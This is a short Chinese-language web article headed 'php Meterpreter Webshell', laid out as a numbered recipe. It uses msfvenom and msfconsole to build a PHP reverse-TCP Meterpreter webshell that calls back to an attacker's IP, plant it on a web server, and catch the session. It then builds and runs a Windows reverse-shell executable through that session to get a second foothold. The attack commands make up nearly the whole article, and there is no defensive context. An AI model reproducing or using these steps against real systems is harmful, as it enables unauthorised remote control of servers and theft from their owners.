首页 移动开发 在线交易 IT笔记 网络技术 操作系统 企业架构 数据库 考试认证 IT培训 开源软件 数据存储 行业资讯
大家都在看:java   开发   C#   oracle   mysql   android   web开发   学习   sqlserver   linux   asp   php   ajax   javascript   css   html
php Meterpreter Webshell
2014-11-17 09:51:08 来源: 作者:admin 栏目:nginx 责任编辑:
[导读] 1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php2. 上传a.php到web服务器3. 启动msfconsole4. use multi/handler5. set LHOST Attacker's_IP6. set LPORT 4437. set payload php/meterpreter/reverse_tcp8. exploit9...
1. msfvenom -p  php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php
2. 上传a.php到web服务器
3. 启动msfconsole
4. use multi/handler
5. set  LHOST Attacker's_IP
6. set LPORT  443
7. set payload php/meterpreter/reverse_tcp
8. exploit
9. 攻击者使用浏览器访问上传的文件
10.此时,攻击者可以得到一个meterpreter session
11.打开一个终端,然后再创建一个payload
msfpayload windows/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=4444
X>payload.exe
12. 在session中使用upload命令将payload.exe上传
13. 然后在第二个终端中运行msfconsole,设置multi/handler,paylaod为'windows/meterpreter/reverse_tcp
14. 在第一个终端中运行execute -f payload.exe
这时可以在第二个终端中获得一个meterpreter session
标签:
本站地址:/
版权所有:转载请注明出处!
分享到:
上一篇共享经济的背后 下一篇全路径泄漏
您可能还喜欢
暂无...
今日最新资讯 最新推荐信息
考试认证 更多
开发技术 更多
移动开发 更多

关于 | 合作伙伴 | 联系我们 | 友情链接 | 版权声明 | 网站制作 | 网站地图 | 加入收藏 | 设为首页

Copyright@2012-2016 京ICP备12027873号